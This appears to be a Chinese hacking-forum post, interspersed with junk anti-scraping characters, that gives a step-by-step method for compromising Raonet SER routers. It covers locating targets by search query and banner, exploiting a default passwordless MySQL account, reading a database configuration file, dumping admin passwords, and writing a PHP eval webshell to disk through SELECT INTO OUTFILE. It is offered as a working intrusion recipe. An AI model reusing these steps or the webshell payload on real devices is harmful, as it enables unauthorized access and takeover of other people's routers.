寻找存在漏洞的路由器方法:0 ~8 S! b z% o, u6 u( H
% ^. z4 x/ g( J3 |& K1:google搜索'Raonet Subscriber Ethernet Router'+ p* l6 h. R- O% u6 f
6 {: t; }2 {6 F1 r, z/ _3 F
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 z( n8 }2 X4 ^, J
0 ~# o. \- c, F! C4 K8 [3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。6 e/ {, ^* g5 ]- W% N2 t( G
& N! \1 W4 l/ E0 j; k# P9 x; Q7 l//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 t5 @6 J7 y; n1 ^5 D# D6 i$ Y. n i) C9 _" `
& U" O" S; S' V% B5 s2 p+ F8 i# X, I7 J/ R" E y; Y
入侵步骤:, A3 \; V4 d( }5 N' j4 d9 L0 ?, u
8 Z4 D; ?1 H: F. Y- _' A1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php" K8 \% D' H% |% t1 s
: v( p4 v( V9 M' O) z" ?, K$ ]2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& i8 [0 l. U7 s# h6 V" @$ J: i' [
3:得到密码后连接,查看GUI管理密码:
' |! ?9 R" m: d! x9 @use ser_500
1 V. x( Y( o Z* t% E$ Tselect id,passwd from user;
/ n! w2 E; Q0 \7 s4:通过数据库写入webshell,执行命令:
" r9 O2 X5 N4 I$ l/ i& ?' ause mysql;
* v' y" A: l* J+ F' tcreate table ok(cmd TEXT);
* U" C0 o# S6 E, c3 sinsert into ok values("<?php @eval($_POST[cmd])?>");5 Q( K% w3 @ N4 Q2 r [
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 x0 a1 B: g( L3 zdrop table ok;
! v. ?1 G+ i5 P1 s: g' q; Z9 M0 |6 T7 A6 p
5:连接后门shell.php 4 ~, k! P# R, k. y+ N% U4 i
6 s6 x; x1 _2 z3 M( J9 H
6. 搞定!+ u; ?, K+ Y( H, q) Q# d) ]9 c
( ^$ o7 M! r: S: C- \ |
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50